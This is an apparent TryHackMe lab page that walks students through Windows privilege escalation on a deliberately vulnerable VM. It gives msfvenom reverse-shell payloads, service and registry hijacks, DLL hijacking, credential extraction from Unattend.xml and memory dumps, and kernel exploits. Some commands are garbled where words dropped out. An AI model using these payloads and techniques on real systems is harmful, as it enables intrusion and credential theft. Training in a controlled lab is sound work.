Windows PrivEsc Arena
Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. RDP is open. Your credentials are user:password321
medium
75 min
25,650
To access material, start machines and answer questions login.
To complete this room and access the vulnerable Windows machine, you need to first connect to TryHackMe's . If you've not done this before, first complete the OpenVPN room and learn how to connect.
Connect to TryHackMe's VPN.
This room will teach you a variety of Windows privilege escalation tactics, including kernel exploits, hijacking, service exploits, registry exploits, and more. This lab was built utilizing Sagi Shahar's privesc workshop (https://github.com/sagishahar/lpeworkshop (opens in new tab)) and utilized as part of The Cyber Mentor's Windows Privilege Escalation Udemy course (://udemy.com/course/windows-privilege-escalation-for-beginners (opens in new tab)).
All tools needed to complete this course are on the user desktop (C:\Users\user\Desktop\Tools).
Let's first connect to the machine. is open on port 3389. Your credentials are:
username: user
password: password321
For any administrative actions you might take, your credentials are:
username: TCM
password: Hacker123
Deploy the machine and log into the user account via RDP
Open a command prompt and run 'net user'. Who is the other non-default user on the machine?
Detection
Windows
1. Open command prompt and type: C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
2. In Autoruns, click on the ‘Logon’ tab.
3. From the listed results, notice that the “My Program” entry is pointing to “C:\Program Files\Autorun Program\program.exe”.
4. In command prompt type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
5. From the output, notice that the “Everyone” user group has “FILE_ALL_ACCESS” permission on the “program.exe” file.
Exploitation
Kali
1. Open command prompt and type: msfconsole
2. In (msf > prompt) type: use multi/handler
3. In (msf > prompt) type: set payload windows//reverse_tcp
4. In (msf > prompt) type: set lhost [Kali IP Address]
5. In (msf > prompt) type: run
6. Open an additional command prompt and type: msfvenom -p windows//reverse_tcp lhost=[Kali IP Address] -f exe -o program.exe
7. Copy the generated file, program.exe, to the Windows .
Windows
1. Place program.exe in ‘C:\Program Files\Autorun Program’.
2. To simulate the privilege escalation effect, logoff and then log back on as an administrator user.
Kali
1. Wait for a new session to open in .
2. In (msf > prompt) type: sessions -i [Session ID]
3. To confirm that the attack succeeded, in (msf > prompt) type: getuid
Click 'Completed' once you have successfully elevated the machine
Detection
Windows
1.Open command prompt and type: reg query HKLM\Software\Policies\Microsoft\Windows\Installer
2.From the output, notice that “AlwaysInstallElevated” value is 1.
3.In command prompt type: reg query HKCU\Software\Policies\Microsoft\Windows\Installer
4.From the output, notice that “AlwaysInstallElevated” value is 1.
Exploitation
Kali
1. Open command prompt and type: msfconsole
2. In (msf > prompt) type: use multi/handler
3. In (msf > prompt) type: set payload windows//reverse_tcp
4. In (msf > prompt) type: set lhost [Kali IP Address]
5. In (msf > prompt) type: run
6. Open an additional command prompt and type: msfvenom -p windows//reverse_tcp lhost=[Kali IP Address] -f msi -o setup.msi
7. Copy the generated file, setup.msi, to the Windows .
Windows
1.Place ‘setup.msi’ in ‘C:\Temp’.
2.Open command prompt and type: msiexec /quiet /qn /i C:\Temp\setup.msi
Enjoy your shell! :)
Click 'Completed' once you have successfully elevated the machine
Detection
Windows
1. Open prompt and type: Get- -Path hklm:\System\CurrentControlSet\services\regsvc | fl
2. Notice that the output suggests that user belong to “NT AUTHORITY\INTERACTIVE” has “FullContol” permission over the registry key.
Exploitation
Windows
1. Copy ‘C:\Users\User\Desktop\Tools\Source\windows_service.c’ to the Kali .
Kali
1. Open windows_service.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add
2. Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_service.c -o x.exe (NOTE: if this is not installed, use 'sudo install gcc-mingw-w64')
3. Copy the generated file x.exe, to the Windows .
Windows
1. Place x.exe in ‘C:\Temp’.
2. Open command prompt at type: reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
3. In the command prompt type: sc start regsvc
4. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
Click 'Completed' once you have successfully elevated the machine
Detection
Windows
1. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
2. Notice that the “Everyone” user group has “FILE_ALL_ACCESS” permission on the filepermservice.exe file.
Exploitation
Windows
1. Open command prompt and type: copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
2. In command prompt type: sc start filepermsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
Click 'Completed' once you have successfully elevated the machine
Detection
Windows
1. Open command prompt and type: icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
2. From the output notice that the “BUILTIN\Users” group has full access ‘(F)’ to the directory.
Exploitation
Kali
1. Open command prompt and type: msfconsole
2. In (msf > prompt) type: use multi/handler
3. In (msf > prompt) type: set payload windows//reverse_tcp
4. In (msf > prompt) type: set lhost [Kali IP Address]
5. In (msf > prompt) type: run
6. Open another command prompt and type: msfvenom -p windows//reverse_tcp LHOST=[Kali IP Address] -f exe -o x.exe
7. Copy the generated file, x.exe, to the Windows .
Windows
1. Place x.exe in “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”.
2. Logoff.
3. Login with the administrator account credentials.
Kali
1. Wait for a session to be created, it may take a few seconds.
2. In ( > prompt) type: getuid
3. From the output, notice the user is “User-PC\Admin”
Click 'Completed' once you have successfully elevated the machine
Detection
Windows
1. Open the Tools folder that is located on the desktop and then go the Process Monitor folder.
2. In reality, executables would be copied from the victim’s host over to the attacker’s host for analysis during run time. Alternatively, the same software can be installed on the attacker’s host for analysis, in case they can obtain it. To simulate this, right click on Procmon.exe and select ‘Run as administrator’ from the menu.
3. In procmon, select "filter". From the left-most drop down menu, select ‘Process Name’.
4. In the input box on the same line type: dllhijackservice.exe
5. Make sure the line reads “Process Name is dllhijackservice.exe then Include” and click on the ‘Add’ button, then ‘Apply’ and lastly on ‘OK’.
6. Next, select from the left-most drop down menu ‘Result’.
7. In the input box on the same line type: NAME NOT FOUND
8. Make sure the line reads “Result is NAME NOT FOUND then Include” and click on the ‘Add’ button, then ‘Apply’ and lastly on ‘OK’.
9. Open command prompt and type: sc start dllsvc
10. Scroll to the bottom of the window. One of the highlighted results shows that the service tried to execute ‘C:\Temp\hijackme.’ yet it could not do that as the file was not found. Note that ‘C:\Temp’ is a writable location.
Exploitation
Windows
1. Copy ‘C:\Users\User\Desktop\Tools\Source\windows_dll.c’ to the Kali .
Kali
1. Open windows_dll.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add
2. Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.
3. Copy the generated file hijackme., to the Windows .
Windows
1. Place hijackme. in ‘C:\Temp’.
2. Open command prompt and type: sc stop dllsvc & sc start dllsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
Click 'Completed' once you have successfully elevated the machine
Detection
Windows
1. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc
2. Notice that the output suggests that the user “User-PC\User” has the “SERVICE_CHANGE_CONFIG” permission.
Exploitation
Windows
1. In command prompt type: sc config daclsvc binpath= "net localgroup administrators user /add"
2. In command prompt type: sc start daclsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
Click 'Completed' once you have successfully elevated the machine
Detection
Windows
1. Open command prompt and type: sc qc unquotedsvc
2. Notice that the “BINARY_PATH_NAME” field displays a path that is not confined between quotes.
Exploitation
Kali
1. Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
2. Copy the generated file, common.exe, to the Windows .
Windows
1. Place common.exe in ‘C:\Program Files\Unquoted Path Service’.
2. Open command prompt and type: sc start unquotedsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
For additional practice, it is recommended to attempt the TryHackMe room Steel Mountain (https://tryhackme.com/room/steelmountain).
Click 'Completed' once you have successfully elevated the machine
Exploitation
Windows
1. In command prompt type: .exe - -ep bypass
2. In Power Shell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
3. In Power Shell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
4. To confirm that the attack was successful, in Power Shell prompt type: net localgroup administrators
Click 'Completed' once you have successfully elevated the machine
Exploitation
Windows
1. Open command prompt and type: notepad C:\Windows\Panther\Unattend.
2. Scroll down to the “<Password>” property and copy the base64 string that is confined between the “<Value>” tags underneath it.
Kali
1. In a terminal, type: echo [copied base64] | base64 -d
2. Notice the cleartext password
What is the cleartext password found in Unattend.xml?
Exploitation
Kali
1.Open command prompt and type: msfconsole
2.In (msf > prompt) type: use auxiliary/server/capture/http_basic
3.In (msf > prompt) type: set uripath x
4.In (msf > prompt) type: run
Windows
1.Open Internet Explorer and browse to: ://[Kali IP Address]/x
2.Open command prompt and type: taskmgr
3.In Windows Task Manager, right-click on the “iexplore.exe” in the “Image Name” columnand select “Create Dump File” from the popup menu.
4.Copy the generated file, iexplore.DMP, to the Kali .
Kali
1.Place ‘iexplore.DMP’ on the desktop.
2.Open command prompt and type: strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
3.Select the Copy the Base64 encoded string.
4.In command prompt type: echo -ne [Base64 String] | base64 -d
5.Notice the credentials in the output.
Click 'Completed' once you have successfully found all the passwords
Establish a shell
Kali
1. Open command prompt and type: msfconsole
2. In (msf > prompt) type: use multi/handler
3. In (msf > prompt) type: set payload windows//reverse_tcp
4. In (msf > prompt) type: set lhost [Kali IP Address]
5. In (msf > prompt) type: run
6. Open an additional command prompt and type: msfvenom -p windows/x64//reverse_tcp lhost=[Kali IP Address] -f exe > shell.exe
7. Copy the generated file, shell.exe, to the Windows .
Windows
1. Execute shell.exe and obtain reverse shell
Detection & Exploitation
Kali
1. In (msf > prompt) type: run post/multi/recon/local_exploit_suggester
2. Identify exploit/windows/local/ms16_014_wmi_recv_notif as a potential privilege escalation
3. In (msf > prompt) type: use exploit/windows/local/ms16_014_wmi_recv_notif
4. In (msf > prompt) type: set SESSION [ SESSION number]
5. In (msf > prompt) type: set LPORT 5555
6. In (msf > prompt) type: run
NOTE: The shell might default to your eth0 during this attack. If so, ensure you type set lhost [Kali IP Address] and run again.
Click 'Completed' once you have successfully elevated the machine
Ready to learn Cyber Security?
TryHackMe provides free online cyber security training to secure jobs & upskill through a fun, interactive learning environment.
Already have an account? Log in